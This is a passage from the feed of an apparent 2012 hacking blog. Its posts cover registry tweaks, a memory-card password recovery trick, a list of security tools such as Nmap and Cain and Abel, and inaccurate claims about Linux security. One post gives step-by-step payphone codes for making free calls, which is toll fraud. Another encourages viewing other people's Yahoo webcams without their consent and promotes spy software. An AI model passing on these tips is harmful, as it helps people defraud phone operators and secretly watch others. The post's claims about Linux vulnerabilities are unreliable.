Password: : : : &lt;span style="color: orange;"&gt;www.cw-network.info&lt;/span&gt;</description><link>http://hackit2012.blogspot.com/2012/01/usb-steals-pc-passwords.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZzPUhxbqPTRFugHzaauBC5FdT7JpbsFnXLOx6K2Cud3AXVwkgTYKTGAnCPdePjzEKLRjQH47UHjHibW1BQzp7YzDcICseJK6ke_LSCU-XFr9nmBxp3x4dXg430rKm96GDn_90wWgnN9M/s72-c/Rome_Total_War_Box.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-459409694543807589</guid><pubDate>Fri, 06 Jan 2012 07:10:00 +0000</pubDate><atom:updated>2012-01-06T12:40:09.664+05:30</atom:updated><title>-:Linux operating system:-</title><description>&lt;span&gt;&lt;span style="color: orange;"&gt;What Are The Vulnerabilities?&lt;/span&gt;&lt;br /&gt;
The main vulnerability of Linux OS is that anyone can access the code of  the operating system. And, if you are not savvy enough with the  programming code like hackers are. You only need to search for the  correct free Linux hacking tool and you will be able to get inside in no  time.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span&gt;The other problem is that many of the drivers made for  determined hardware. Let's say, a printer is not created by people who  have security in mind. This is specially important for a company who do  not wish to find it's intellectual property is stolen each time they  send something to the printing room.&lt;br /&gt;
&lt;br /&gt;
So, after all of these possible loopholes inside Linux OS, you should  consider using a version that has been designed with security in mind.  Check www.engardelinux.com and find more about this variation of Linux  OS.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: orange;"&gt;What Is Kernel Hacking?&lt;/span&gt;&lt;br /&gt;
The kernel is the software inside a computer that is in charge of  maintaining an adequate communication between the hardware and the rest  of the software. One of the strong points among the Linux community is  that the kernel of a Linux OS can be altered. And for what reason? The  two main motives are fixing any problem that may arise and increase the  efficiency of a driver responsible for managing a determined piece of  hardware&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: orange;"&gt;Hacking Runescape&lt;/span&gt;&lt;br /&gt;
Runescape is a massively multiplayer online role-playing game that was  launched in 2001 by Jagex Limited. The marvelous thing about this online  game is that it is independent of the operating system that you are  using since it works over the web using JAVA (JAVA is a platform that  can work in any kind of computer since it creates a virtual machine for  its own use).&lt;br /&gt;
&lt;br /&gt;
But as in any online game, you will find people who are hacking  Runescape. Although it is free to use and only requires some basic  information for it's subscription, some hackers are willing to spend  their time trying to find a backdoor or any other scheme that will  permit them obtain an advantage over other players. One could say that  it is inevitable due to the competitive nature of our species.&lt;br /&gt;
&lt;br /&gt;
So, Runescape hacking, hacking programs for Runescape, free password  hacking programs for Runescape, files for hacking Runescape and hacking  Runescape accounts has become quite common among players. Although some  could say that there is no grace in doing this since it is basically  cheating, hackers don't think the same. For them, using any method for  being the best in the game isn't only good; it's what is expected from  any human being.&lt;br /&gt;
&lt;br /&gt;
Thanks to free network hacking tools, hackers from around the world with  a basic knowledge of English and some practice with computers, can  start lurking networks everywhere, waiting for their chance to success  and increase their reputation inside the hacking community. Although  right now Windows is the preferred platform, Linux hacking will become a  favorite amongst hackers.&lt;/span&gt;&lt;span&gt; &lt;/span&gt;</description><link>http://hackit2012.blogspot.com/2012/01/linux-operating-system.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-5833962112517198849</guid><pubDate>Fri, 06 Jan 2012 07:09:00 +0000</pubDate><atom:updated>2012-01-11T18:45:08.918+05:30</atom:updated><title>-:Linux hacking:-</title><description>Since Microsoft has a huge chunk of the operating  system's market in the world, it is the first victim of hackers. But  that doesn't mean that Linux hacking doesn't exist. Although is less  common than it's close sourced companion, there are several reasons why  hackers try to hack machines with Linux. Many corporations use &lt;a href="http://www.webhostingsearch.com/linux-web-hosting.php" target="_blank"&gt;&lt;span style="color: orange;"&gt;Linux as their server&lt;/span&gt;&lt;/a&gt;  on the web as it is cheaper and easier to deploy. Its security is also  better when compared to Microsoft operating systems. No wonder that  network hacking tools for this open source operating system have  proliferated in the last years.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: orange;"&gt;What Are The Issues With Open Source Linux?&lt;/span&gt;&lt;br /&gt;
The main difference between Linux and Windows is that Linux is open  source and windows are closed source. So? Well, that means that only  Microsoft is authorized to change any part of the code of the Windows  operating system. While in Linux, anyone can change it.&lt;br /&gt;
&lt;br /&gt;
The other problem is that the Linux Operating System doesn't receive the  same level of support as Windows does. That means that updates and  security packages are released with each new version of the Operating  System (OS), but not as periodic updates as in the case of Windows XP's  Windows Update.&lt;br /&gt;
&lt;br /&gt;
That means that the user will have to be the one responsible for  checking for the updates instead of trusting this matter to an  organization. So, a user could pass long periods of time without knowing  that his OS has an important security failure that could compromise his  work or even the security of his network.&lt;br /&gt;
&lt;br /&gt;
The only way to contra rest this inconvenient, is buying support from a  determined Linux OS provider, like Red Hat. For an annual fee, they will  provide you with important information on the different bugs that have  been found in the OS and that need to be fixed.&lt;br /&gt;
&lt;br /&gt;
If you choose otherwise, you will spend a long time inside forums  talking to Linux experts around the world. If that isn't the core  competence of your business, why should you spend that time doing it?  That's one of the main arguments that Microsoft uses when comparing it's  OS with open source OS's.&lt;br /&gt;
&lt;br /&gt;
Continue to &lt;a href="http://hackit2012.blogspot.com/2012/01/linux-operating-system.html"&gt;&lt;span style="color: orange;"&gt;&lt;u&gt;Weakness in Linux OS&lt;/u&gt;&lt;/span&gt;&lt;/a&gt;</description><link>http://hackit2012.blogspot.com/2012/01/linux-hacking.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-8463700123717068890</guid><pubDate>Fri, 06 Jan 2012 07:04:00 +0000</pubDate><atom:updated>2012-01-11T18:44:51.012+05:30</atom:updated><title>-:Talk 999 min for almost free:-</title><description>talk free from 1 rupee coin box..&lt;br /&gt;
Check this talk free from 1 rupee coin box..&lt;br /&gt;
100% Works !&lt;br /&gt;
yes u can talk free from 1 rupee coin box&lt;br /&gt;
wht u hve 2 do is first pick up the reciever&lt;br /&gt;
dial *** then 68807 then first 7 no.s which u r calling then #" 999"&lt;br /&gt;
this 999 is for your limit u can talk 999 min so u can only press no.s like this for eg&lt;br /&gt;
333 , 444, 555 do 999 it will be better then #0&lt;br /&gt;
then insert the coin nd dial full number nd u can talk for 999 minutes free&lt;br /&gt;
full code ***68807 first seven no.s #999#0&lt;br /&gt;
imp thing ------ this only works on red 1 rupee coin box do it..&lt;br /&gt;
It works 100% !!!</description><link>http://hackit2012.blogspot.com/2012/01/talk-999-min-for-almost-free.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-6792508340615715342</guid><pubDate>Fri, 06 Jan 2012 06:55:00 +0000</pubDate><atom:updated>2012-01-11T18:44:17.512+05:30</atom:updated><title>-:how-to-unlock-password-protected-memory-cards:-</title><description>Well its quite simple but most of the people do not know it.&lt;br /&gt;
Please note the fact that it only works if the password to the MMC Card was set in ur own mobile,where u want it to be unlocked.&lt;br /&gt;
This method works well for nokia cells with symbian operating  system.Never tried on other cells.use any software like FXplorer that  can browse files in ur cell.&lt;br /&gt;
&lt;br /&gt;
1. Open one of above software you have.&lt;br /&gt;
2. Browse through the directory, C:system&lt;br /&gt;
3. Rename the file mmcstore to mmcstore.txt&lt;br /&gt;
4. Open the file - The file will open in Notes.&lt;br /&gt;
5. You will find your password in that file. That file would also  contain much more data which you do not understand,so you need to go  through the file to get the password!&lt;br /&gt;
&lt;br /&gt;
When ur cell is connected to pc by means of data cable or bluetooth,u  can see the password by simply opening the file mmcstore with notepad.</description><link>http://hackit2012.blogspot.com/2012/01/how-to-unlock-password-protected-memory.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-2126545434626907575</guid><pubDate>Fri, 06 Jan 2012 06:50:00 +0000</pubDate><atom:updated>2012-01-11T18:43:55.753+05:30</atom:updated><title>-:Search Engine tips:-</title><description>If you want to get some information about any topic  using search engine, the search engine will search the given information  and will provide a list of links of websites along brief description  about each website. You should use the right search terms for relevant  results.&lt;br /&gt;
&lt;br /&gt;
The following points must be noted to search the information on the internet.&lt;br /&gt;
&lt;br /&gt;
·       •You can type all word in lowercase and also in uppercase,  search engine will return the same result. But the best practice is type  search keywords always in lowercase.&lt;br /&gt;
&lt;br /&gt;
•Use + sign between words if you want to search the all words. For example, to search history of Football in Europe, type as:&lt;br /&gt;
history+Football+Europe&lt;br /&gt;
&lt;br /&gt;
•To search the exact match, write the words in double quotation marks. For example to search the map of Europe, then type as:&lt;br /&gt;
"Map of Europe"&lt;br /&gt;
&lt;br /&gt;
• Always avoid to use "and", "or" with search keywords, because these words will affect the search result.&amp;nbsp;</description><link>http://hackit2012.blogspot.com/2012/01/search-engine-tips.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-5467773957289642823</guid><pubDate>Fri, 06 Jan 2012 06:38:00 +0000</pubDate><atom:updated>2012-01-11T18:43:03.819+05:30</atom:updated><title>-:Yahoo webcam without permission:-</title><description>Without No doubt, It almost impossible for us to achieve  an access to view yahoo webcam without Permission. We believe that what  we means about, Accessing Yahoo Webcam without Permission is a way we  don’t even need an permission or acceptance from the owner of the web  cam of yahoo messenger to view their webcam. We already knew that Yahoo  Messenger designed to handle view webcam had to accept first from the  user before they can view their webcam. So, is there any possibility to  view Yahoo Messenger webcam without Permission?&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: orange;"&gt;Access View Yahoo Webcam Auto Accept&lt;/span&gt;&lt;br /&gt;
Legally, there is only one way to view webcam “without need a  permission”. Without need a permission here, means that we don’t even to  wait the owner of the yahoo webcam to click or push the accept button  of request window of yahoo messenger webcam. It is better if we call  this “without need a permission” in legal way is “Yahoo Webcam Auto  Accept“. How to make auto accept of Yahoo Webcam? Go to webcam setting  and then add user in the box of “&lt;span style="color: orange;"&gt;Always allow the following people to view my webcam&lt;/span&gt;“.  This will make the user that has this option will always set auto  accept when they are requesting the owner webcam. The problem is how we  can add our yahoo id in there? Just figure it out how you can do it. OK?&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHXJb_hggw31KgoumMVOaL8kIhkAiwudyoMdk3kKmHboAsTyEX9930aVZTLMIwiexlF5-5hjsunNDZDqzNRb-0wuMBvykfexoc8u0V48Iw9ycp2tf52T2XA6zQ53w4evcQeHwutkHVyOI/s1600/viewwebcamaccept.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHXJb_hggw31KgoumMVOaL8kIhkAiwudyoMdk3kKmHboAsTyEX9930aVZTLMIwiexlF5-5hjsunNDZDqzNRb-0wuMBvykfexoc8u0V48Iw9ycp2tf52T2XA6zQ53w4evcQeHwutkHVyOI/s320/viewwebcamaccept.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: orange;"&gt;View Webcam Without Permission Remote Webcam&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO76QUFIMGgYpP-9ZY6ihlt6oGFJlvFzZ8igwRsr9MHec2XOP2c1WoEQMI_ZvhDGDpD4HPof5l3-q5aiC35nhZWfK3rRblvmEzL5JDotCC-AWOSg3Nx6vuS6ef_T-e5yNDUqPfSg7z7ls/s1600/screenshot2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO76QUFIMGgYpP-9ZY6ihlt6oGFJlvFzZ8igwRsr9MHec2XOP2c1WoEQMI_ZvhDGDpD4HPof5l3-q5aiC35nhZWfK3rRblvmEzL5JDotCC-AWOSg3Nx6vuS6ef_T-e5yNDUqPfSg7z7ls/s320/screenshot2.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We will tell you, this software called as I Can See You  is work like CCTV. That way we can use it as “Webcam Without  Permission”. Without Permission in here means that we don’t need to  accept the view webcam or when we try to view webcam because the web cam  is always set accepted. No need Messenger Client Service to do it. All  we have to have just Webcam and Internet Connection. How to achieve it?&lt;br /&gt;
&lt;br /&gt;
Like we said above, this Remote Webcam is software that will remote from  others computer of the webcam computer that been installed the  software. For example, we can view our webcam in home or office when we  are far away from them such as in vacation or in a way home.&lt;br /&gt;
&lt;br /&gt;
Unfortunately, this software that sometime called as Webcam Spy is not  freeware software. You need to buy it to use it. You can buy at  &lt;a href="http://www.regnow.com/softsell/nph-softsell.cgi?item=8319-16&amp;amp;affiliate=280307" target="_blank"&gt;&lt;span style="color: orange;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="color: orange;"&gt;&amp;nbsp;&lt;/span&gt;&amp;nbsp;</description><link>http://hackit2012.blogspot.com/2012/01/yahoo-webcam-without-permission.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHXJb_hggw31KgoumMVOaL8kIhkAiwudyoMdk3kKmHboAsTyEX9930aVZTLMIwiexlF5-5hjsunNDZDqzNRb-0wuMBvykfexoc8u0V48Iw9ycp2tf52T2XA6zQ53w4evcQeHwutkHVyOI/s72-c/viewwebcamaccept.jpg" width="72"/><thr:total>50</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-4855771805824226663</guid><pubDate>Fri, 06 Jan 2012 06:33:00 +0000</pubDate><atom:updated>2012-01-11T18:42:45.309+05:30</atom:updated><title>-:Yahoo multi messenger without software:-</title><description>I am going to tell abt yahoo multimessenger.... with  installing any software....main thing is u can get same version of  messenger u r using...which is not possible with yahoo multimessenger  software just make the things as following....  go to start menu and select run  just type "regedit" in that now u will get a window now in that select HKEY_CURRENT_USER in that go for SOFTWARE  -----&amp;gt;YAHOO----&amp;gt;PAGER-----&amp;gt;TEST now just slect on TEST on the right side u can see name type data in that u will have default........... now below default just right clik and create new one .....in new u have  to select DWORD VALUE then  right click on created one and rename it to 'plural'&lt;br /&gt;
&lt;br /&gt;
again right click on it and u can c MODIFY clik on it ..  now change VALUE DATA to 1 and there itself change BASE to decimal from hexadecimal.....thats it  frndz... now just once logoff from ur messenger and again sign in..... now just clik on the yahoo messenger where u will open ur messenger  usually....u can open any no of messenger u want...&lt;br /&gt;
...enjoy  frndz,,,.&lt;br /&gt;
From Hackit!!!</description><link>http://hackit2012.blogspot.com/2012/01/yahoo-multi-messenger-without-software.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-4915764552133227222</guid><pubDate>Fri, 06 Jan 2012 06:21:00 +0000</pubDate><atom:updated>2012-01-11T18:42:25.832+05:30</atom:updated><title>-:Change the Default Directory of Software Installation:-</title><description>You may want to change the location of your system  default folder (C:Program Files) from C drive to another system drives  (D or E drive). By default software setup will attempt to install  program in C:Program Files directory. It is good practice to make the  backup of the installed programs, if you installed all your programs in  other than C drive. If you have little knowledge about editing windows  registry then you can configure your computer for this purpose.&lt;br /&gt;
&lt;br /&gt;
Follow the given steps to configure windows registry:&lt;br /&gt;
&lt;br /&gt;
1. Click on Start button then type Regedit in Run option.&lt;br /&gt;
&lt;br /&gt;
2. Here navigate to: HKEY_LOCAL_MACHINE&amp;gt;SOFTWARE&amp;gt;Microsoft&amp;gt;Windows&amp;gt;CurrentVersion&lt;br /&gt;
&lt;br /&gt;
3. In right side panel, double click on ProgramFileDir.&lt;br /&gt;
&lt;br /&gt;
4. Now modify the value to any other drive (for example D:Program Files).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now close the registry editor and restart your computer after any changes to go into effect.</description><link>http://hackit2012.blogspot.com/2012/01/change-default-directory-of-software.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-2645127982817664400</guid><pubDate>Thu, 05 Jan 2012 07:31:00 +0000</pubDate><atom:updated>2012-01-11T18:41:53.702+05:30</atom:updated><title>-:Hack This Website Test:-</title><description>&lt;span style="font-size: small;"&gt;If you really think you are a hacker, then&lt;br /&gt;
&lt;br /&gt;
Go to:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.hack-test.com/"&gt;&lt;span style="font-size: small;"&gt;www.hack-test.com&lt;/span&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;Reply with what level you are on!!&lt;/span&gt;</description><link>http://hackit2012.blogspot.com/2012/01/hack-this-website-test.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-8443683485210165240</guid><pubDate>Thu, 05 Jan 2012 07:28:00 +0000</pubDate><atom:updated>2012-01-11T18:41:33.529+05:30</atom:updated><title>-:Top 15 Hacking Software:-</title><description>1. Nmap&lt;br /&gt;
&lt;br /&gt;
I think everyone has heard of this one, recently evolved into the 4.x series.&lt;br /&gt;
&lt;br /&gt;
Nmap (”Network Mapper”) is a free open source utility for network  exploration or security auditing. It was designed to rapidly scan large   networks, although it works fine against single hosts. Nmap uses raw IP  packets in novel ways to determine what hosts are available on the   network, what services (application name and version) those hosts are  offering, what operating systems (and OS versions) they are running,  what   type of packet filters/firewalls are in use, and dozens of other  characteristics. Nmap runs on most types of computers and both console  and   graphical versions are available. Nmap is free and open source.&lt;br /&gt;
Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.&lt;br /&gt;
&lt;span style="color: orange;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.insecure.org/nmap/download.html"&gt;&lt;span style="color: orange;"&gt;Get Nmap Here&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
2. Nessus Remote Security Scanner&lt;br /&gt;
&lt;br /&gt;
Recently went closed source, but is still essentially free. Works with a client-server framework.&lt;br /&gt;
&lt;br /&gt;
Nessus is the world’s most popular vulnerability scanner used in over  75,000 organizations world-wide. Many of the world’s largest   organizations are realizing significant cost savings by using Nessus to  audit business-critical enterprise devices and applications.&lt;br /&gt;
&lt;span style="color: orange;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.nessus.org/download/"&gt;&lt;span style="color: orange;"&gt;Get Nessus Here&lt;/span&gt;&lt;/a&gt;&lt;span style="color: orange;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span style="color: orange;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
3. John the Ripper&lt;br /&gt;
&lt;br /&gt;
Yes, JTR 1.7 was recently released!&lt;br /&gt;
&lt;br /&gt;
John the Ripper is a fast password cracker, currently available for many  flavors of Unix (11 are officially supported, not counting different   architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to  detect weak Unix passwords. Besides several crypt(3) password hash   types most commonly found on various Unix flavors, supported out of the  box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus   several more with contributed patches.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.openwall.com/john/"&gt;You can get JTR Here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
4. Nikto&lt;br /&gt;
&lt;br /&gt;
Nikto is an Open Source (GPL) web server scanner which performs  comprehensive tests against web servers for multiple items, including  over 3200   potentially dangerous files/CGIs, versions on over 625 servers, and  version specific problems on over 230 servers. Scan items and plugins  are   frequently updated and can be automatically updated (if desired).&lt;br /&gt;
&lt;br /&gt;
Nikto is a good CGI scanner, there are some other tools that go well  with Nikto (focus on http fingerprinting or Google hacking/info  gathering   etc, another article for just those).&lt;br /&gt;
&lt;span style="color: orange;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.cirt.net/code/nikto.shtml"&gt;&lt;span style="color: orange;"&gt;Get Nikto Here&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
5. SuperScan&lt;br /&gt;
&lt;br /&gt;
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of  the highly popular Windows port scanning tool, SuperScan.&lt;br /&gt;
&lt;br /&gt;
If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&amp;amp;subcontent=/resources/proddesc/superscan4.htm"&gt;&lt;span style="color: orange;"&gt;Get SuperScan Here&lt;/span&gt;&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
6. p0f&lt;br /&gt;
&lt;br /&gt;
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:&lt;br /&gt;
&lt;br /&gt;
- machines that connect to your box (SYN mode),&lt;br /&gt;
- machines you connect to (SYN+ACK mode),&lt;br /&gt;
- machine you cannot connect to (RST+ mode),&lt;br /&gt;
- machines whose communications you can observe.&lt;br /&gt;
&lt;br /&gt;
Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.&lt;br /&gt;
&lt;span style="color: orange;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://lcamtuf.coredump.cx/p0f/p0f.shtml"&gt;&lt;span style="color: orange;"&gt;Get p0f Here&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
7. Wireshark (Formely Ethereal)&lt;br /&gt;
&lt;br /&gt;
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that  lets you capture and interactively browse the contents of network  frames.   The goal of the project is to create a commercial-quality analyzer for  Unix and to give Wireshark features that are missing from closed-source   sniffers.&lt;br /&gt;
&lt;br /&gt;
Works great on both Linux and Windows (with a GUI), easy to use and can  reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.&lt;br /&gt;
&lt;span style="color: orange;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: orange;"&gt;&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.wireshark.org/"&gt;&lt;span style="color: orange;"&gt;Get Wireshark Here&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
8. Yersinia&lt;br /&gt;
&lt;br /&gt;
Yersinia is a network tool designed to take advantage of some weakeness  in different Layer 2 protocols. It pretends to be a solid framework for   analyzing and testing the deployed networks and systems. Currently, the  following network protocols are implemented: Spanning Tree Protocol   (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP),  Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol   (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking  Protocol (VTP).&lt;br /&gt;
&lt;br /&gt;
The best Layer 2 kit there is.&lt;br /&gt;
&lt;span style="color: orange;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://yersinia.sourceforge.net/"&gt;&lt;span style="color: orange;"&gt;Get Yersinia Here&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
9. Eraser&lt;br /&gt;
&lt;br /&gt;
Eraser is an advanced security tool (for Windows), which allows you to  completely remove sensitive data from your hard drive by overwriting it   several times with carefully selected patterns. Works with Windows 95,  98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source   code is released under GNU General Public License.&lt;br /&gt;
&lt;br /&gt;
An excellent tool for keeping your data really safe, if you’ve deleted  it..make sure it’s really gone, you don’t want it hanging around to bite    you in the ass.&lt;br /&gt;
&lt;span style="color: orange;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.heidi.ie/eraser/download.php"&gt;&lt;span style="color: orange;"&gt;Get Eraser Here&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
10. PuTTY&lt;br /&gt;
&lt;br /&gt;
PuTTY is a free implementation of Telnet and SSH for Win32 and Unix  platforms, along with an xterm terminal emulator. A must have for any  h4×0r   wanting to telnet or SSH from Windows without having to use the crappy  default MS command line clients.&lt;br /&gt;
&lt;span style="color: orange;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.chiark.greenend.org.uk/%7Esgtatham/putty/"&gt;&lt;span style="color: orange;"&gt;Get PuTTY Here&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
11. LCP&lt;br /&gt;
&lt;br /&gt;
Main purpose of LCP program is user account passwords auditing and  recovery in Windows NT/2000/XP/2003. Accounts information import,  Passwords   recovery, Brute force session distribution, Hashes computing.&lt;br /&gt;
&lt;br /&gt;
A good free alternative to L0phtcrack.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.darknet.org.uk/2006/02/password-cracking-with-rainbowcrack-and-rainbow-tables/"&gt;&lt;span style="color: orange;"&gt;LCP was briefly   mentioned in our well read Rainbow Tables and RainbowCrack article&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style="color: orange;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.lcpsoft.com/english/download.htm"&gt;&lt;span style="color: orange;"&gt;Get LCP Here&lt;/span&gt;&lt;/a&gt;&lt;span style="color: orange;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span style="color: orange;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
12. Cain and Abel&lt;br /&gt;
&lt;br /&gt;
My personal favourite for password cracking of any kind.&lt;br /&gt;
&lt;br /&gt;
Cain &amp;amp; Abel is a password recovery tool for Microsoft Operating  Systems. It allows easy recovery of various kind of passwords by  sniffing the   network, cracking encrypted passwords using Dictionary, Brute-Force and  Cryptanalysis attacks, recording VoIP conversations, decoding scrambled   passwords, revealing password boxes, uncovering cached passwords and  analyzing routing protocols. The program does not exploit any software   vulnerabilities or bugs that could not be fixed with little effort.&lt;br /&gt;
&lt;span style="color: orange;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.oxid.it/cain.html"&gt;&lt;span style="color: orange;"&gt;Get Cain and Abel Here&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
13. Kismet&lt;br /&gt;
&lt;br /&gt;
Kismet is an 802.11 layer2 wireless network detector, sniffer, and  intrusion detection system. Kismet will work with any wireless card  which   supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a,  and 802.11g traffic.&lt;br /&gt;
&lt;br /&gt;
A good wireless tool as long as your card supports rfmon (look for an orinocco gold).&lt;br /&gt;
&lt;span style="color: orange;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.kismetwireless.net/download.shtml"&gt;&lt;span style="color: orange;"&gt;Get Kismet Here&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
14. NetStumbler&lt;br /&gt;
&lt;br /&gt;
Yes a decent wireless tool for Windows! Sadly not as powerful as it’s  Linux counterparts, but it’s easy to use and has a nice interface, good   for the basics of war-driving.&lt;br /&gt;
&lt;br /&gt;
NetStumbler is a tool for Windows that allows you to detect Wireless  Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has   many uses:&lt;br /&gt;
&lt;br /&gt;
Verify that your network is set up the way you intended.&lt;br /&gt;
Find locations with poor coverage in your WLAN.&lt;br /&gt;
Detect other networks that may be causing interference on your network.&lt;br /&gt;
Detect unauthorized “rogue” access points in your workplace.&lt;br /&gt;
Help aim directional antennas for long-haul WLAN links.&lt;br /&gt;
Use it recreationally for WarDriving.&lt;br /&gt;
&lt;span style="color: orange;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.stumbler.net/"&gt;&lt;span style="color: orange;"&gt;Get NetStumbler Here&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
15. hping&lt;br /&gt;
&lt;br /&gt;
To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.&lt;br /&gt;
&lt;br /&gt;
hping is a command-line oriented TCP/IP packet assembler/analyzer. The  interface is inspired to the ping unix command, but hping isn’t only   able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP  protocols, has a traceroute mode, the ability to send files between a   covered channel, and many other features.&lt;br /&gt;
&lt;span style="color: orange;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.hping.org/"&gt;&lt;span style="color: orange;"&gt;Get hping Here&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
